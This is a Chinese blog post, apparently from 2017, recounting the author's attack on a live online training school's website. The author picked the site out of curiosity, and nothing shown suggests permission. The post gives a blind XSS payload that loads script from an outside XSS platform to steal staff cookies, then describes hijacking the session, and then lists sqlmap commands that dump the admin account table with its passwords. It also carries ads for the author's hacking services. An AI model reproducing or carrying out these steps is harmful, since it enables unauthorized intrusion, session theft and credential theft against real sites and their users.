记一次以小勃大，紧张刺激的渗透测试(2017年老文)

零、前言

有技术交流或渗透测试培训需求的朋友欢迎联系QQ/VX-547006660，需要代码审计、渗透测试、红蓝对抗网络安全相关业务可以看置顶博文

2000人网络安全交流群，欢迎大佬们来玩
群号820783253

一、起因

emmm，炎炎夏日到来，这么个桑拿天干什么好呢？

没错，一定要坐在家里，吹着空调，吃着西瓜，然后静静地挖洞。挖洞完叫个外卖，喝着啤酒，撸着烧烤，岂不美哉？然此可为智者道，难为俗人言也。。。正在我沉迷在对夏日的意淫之时，我亲爱的妈妈忽然给我来了一波夺命连环call。

大概内容如下：
   --妈妈：儿呀。。。你印布隐私（认不认识）搞公务员培训的机构，帮我在网上瞅瞅去，我有个朋友他儿想考公务员~
   --我：（声音笑嘻嘻，心里mmp）哎呀，这个bia的天，搁家里睡觉行了。。别弄了。。
   --妈妈：MLGB，叫你整，你就快点的，晚上给我回电话。
     哎，父母之命不可违，悲伤的我只能放下手里的键盘和瓜皮，开始去百度上找培训机构。

百度上面找了好久，都没找到太合适的。问了问身边的朋友：朋友给了一家网校的报名地址
http://.com/3g//2203947.htm

没错，还带免费试学。。。真的先进。。。。
然而作为一名做培训的职业小学生，怎么肯轻信这种网校的培训质量？于是打开爱站查了一波权重。。。

这尼玛？？？百度权7，emmm，有点意思。见到这么高权重的站，那时我已饥渴难耐，便决定对此站点来一波渗透测试。

二、XSS盲打？安排一下

看到这里，小伙伴们肯定想。。。emm，是不是可以XSS打一下试试呢？
说干咱就干。。。见框就插,接下来就插入xss payload试试吧。。。
Payload: </textarea><script src="="http://xsspt.com/z6ocdy?1531815744"></script>
将payload完整黏贴进去，如图发现仅有</tex 这四个字符

审查元素看下，在表单处理上设置了maxlength，直接审查元素大法改掉就好了
max length改为999

然后我们的XSS Payload就可以正常地全部输入到表单中了

手机那个文本框，我随便填了11位数字，然后点击提交，万幸的的是提交成功了（后端没对内容进行验证）
过了大概1个小时，突然XSS平台的邮件来了，兴奋ing。。。（客服是真的敬业）

拿着cookie，挂好代理傻啦吧唧地就是进入后台一波浏览，发现权限非常小，基本上只能处理处理客服工作

不过可以查看后台的管理员账号。。。。。（果然是个大站，后台分工权限这么讲究。。。）

看着这么多的超级管理员账号，而我却只是个吊毛客服，基本上没什么权限，心里真的难受的一批。。
难道我们的渗透到这里就要结束？？不可能，这显然不符合本屌的风格。。。

于是我又仔细地翻了翻后台，看看有没有地方可以来一波骚操作。。。

三、后台SQL注入？讲究

大家可以看到我们的客服处理界面是可以进行查询的，查询的过程是通过GET方式传导一个mobile参数实现查询

我们直接测试一下SQL注入的Payload，看看是否存在注入。发现页面没有返回信息，那么就很有可能存在SQL注入。

我们使用BurpSuite来抓取本出的的HTTP请求，然后保存在C:\Users\Samsung 700Z5C\Desktop\1.txt中

接下来到了以小勃大，紧张刺激的时刻，使用SQLMAP的 -r参数，注入本HTTP请求
sqlmap -r C:\Users\Samsung 700Z5C\Desktop\1.txt

注入成功了。哈哈哈。。。。我们开始直奔管理员的表
命令为sqlmap -r C:\Users\Samsung 700Z5C\Desktop\1.txt --tables -D "nd_net" //列出nd_net数据库的表

然后执行
sqlmap -r C:\Users\Samsung 700Z5C\Desktop\1.txt --columns -T "net_admin_user" -D "nd_net" //列出net_admin_user表的字段

最后执行命令
sqlmap.py -r "I:\T00l\1.txt" --dump -C "id,nd_user,userid,nd_pass" -T "net_admin_user" -D "nd_net" --threads=10 //导出net_admin_user表中id,nd_user,userid,nd_pass几个字段的数据